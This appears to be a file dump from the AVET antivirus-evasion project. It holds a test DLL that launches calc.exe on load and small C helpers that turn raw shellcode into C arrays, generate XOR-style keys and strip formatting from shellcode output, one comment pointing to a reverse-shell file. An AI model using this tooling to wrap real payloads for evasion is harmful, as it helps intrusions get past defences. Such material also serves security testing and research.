/source/payload_execution_method/payload_execution_method.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/static_data/static_data.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /test_payloads/exec_calc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { 6 | system("calc.exe"); 7 | return TRUE; 8 | } 9 | -------------------------------------------------------------------------------- /tools/data_raw_to_c/data_raw_to_c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/tools/data_raw_to_c/data_raw_to_c -------------------------------------------------------------------------------- /tools/data_raw_to_c/data_raw_to_c.c: -------------------------------------------------------------------------------- 1 | #include "../../source/data_utility.h" 2 | 3 | 4 | // Takes raw data as input from a file, converts it into C-array format and writes output to another file. 5 | // 6 | // argv[1]: Name of the file to read the raw data from 7 | // argv[2]: Name of the file to write the C-style array into 8 | // argv[3]: Name of the array to write the data into 9 | int main(int argc, char **argv) { 10 | int data_size = 0; 11 | unsigned char *data = data_from_file_raw(argv[1], &data_size); 12 | data_to_file(data, data_size, argv[2], argv[3]); 13 | return 0; 14 | } 15 | -------------------------------------------------------------------------------- /tools/generate_key/generate_key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/tools/generate_key/generate_key -------------------------------------------------------------------------------- /tools/generate_key/generate_key.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "../../source/data_utility.h" 6 | 7 | 8 | // Generates a (non-cryptographically) random byte sequence. 9 | // Length of the sequence will be key_length bytes. 10 | // Memory for the key will be allocated by the function. 11 | unsigned char *generate_key(int key_length) { 12 | // Init random structures 13 | time_t t; 14 | srand((unsigned) time(&t)); 15 | 16 | // Allocate memory for key 17 | unsigned char *key = (unsigned char *) malloc(key_length); 18 | 19 | // Generate key bytes 20 | for(int i = 0; i < key_length; i++) { 21 | key[i] = rand() % 256; 22 | } 23 | 24 | return key; 25 | } 26 | 27 | 28 | // Retrieves data from a "11aabb22..." format hex string given by arg1. 29 | // 30 | // data_size receives the size of the data in bytes. 31 | unsigned char *from_command_line_hex(char *arg1, int *data_size) { 32 | // Get input string length 33 | int input_length = strlen(arg1); 34 | 35 | // Convert ASCII hex string into raw bytes 36 | char current_hex[5] = "0xaa"; 37 | 38 | // Each data byte is represented by 2 ASCII symbols 39 | *data_size = input_length / 2; 40 | unsigned char *data = (unsigned char *) malloc(*data_size); 41 | 42 | // Hex string is of format aabb01cc34... 43 | // Each loop iteration handles a 2-character chunk 44 | int j = 0; 45 | char *endptr; // Required by strtoul function 46 | 47 | for(int i = 0; i < input_length; i++) { 48 | // Interpret hex representation as unsigned char value 49 | memcpy(&(current_hex[2]), &(arg1[2 * i]), 2); 50 | data[j] = (unsigned char) strtoul(current_hex, &endptr, 16); 51 | j++; 52 | } 53 | 54 | return data; 55 | } 56 | 57 | 58 | // Key generation utility. Generates either a random key or takes a preset key, 59 | // and outputs the raw (!!!) key data into a specified file. 60 | // Arguments expected: 61 | // 62 | // argv[1]: (random|preset) 63 | // Random: Generates a random byte sequence. Sequence length in bytes is specified in argv[2]. 64 | // Preset: Allows to enter a preset key via argv[2]. Input format is a hex string, such as aabbccdd... 65 | // argv[2]: Either specifies key length in bytes, or a preset key via hex string, depending on argv[1] choice. 66 | // argv[3]: Name of the output file to write generated raw key data into. 67 | 68 | int main(int argc, char **argv) { 69 | int key_length = 0; 70 | unsigned char *key = 0; 71 | 72 | // Generate random key 73 | if(strcmp(argv[1], "random") == 0) { 74 | // Convert key length specified in second argument 75 | key_length = strtol(argv[2], NULL, 10); 76 | // Generate key of specified length 77 | key = generate_key(key_length); 78 | } 79 | 80 | // Read preset key 81 | if(strcmp(argv[1], "preset") == 0) { 82 | // Get key from command line argument argv[2] 83 | key = from_command_line_hex(argv[2], &key_length); 84 | } 85 | 86 | // Write raw key data to output file 87 | data_to_file_raw(key, key_length, argv[3]); 88 | 89 | return 0; 90 | } 91 | -------------------------------------------------------------------------------- /tools/sh_format/sh_format: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/tools/sh_format/sh_format -------------------------------------------------------------------------------- /tools/sh_format/sh_format.c: -------------------------------------------------------------------------------- 1 | //./sh_format rev.txt | tr -d "\n" | tr -d "x" | tr -d "\\" | tr -d "\"" | tr -d ";" 2 | 3 | #include 4 | #include 5 | 6 | int main (int argc, char **argv) 7 | { 8 | char *filename = argv[1]; 9 | FILE *file = fopen ( filename, "r" ); 10 | int u = 0; 11 | if ( file != NULL ) 12 | { 13 | char line [ 500 ]; 14 | while ( ( fgets ( line, sizeof line, file ) != NULL ) && (u<=1) ) 15 | { 16 | if (line[0]=='u') 17 | u++; 18 | 19 | 20 | else if (line[0]=='\"') 21 | fputs ( line, stdout ); 22 | 23 | } 24 | fclose ( file ); 25 | } 26 | else 27 | { 28 | perror ( filename ); 29 | } 30 | return 0; 31 | } 32 | --------------------------------------------------------------------------------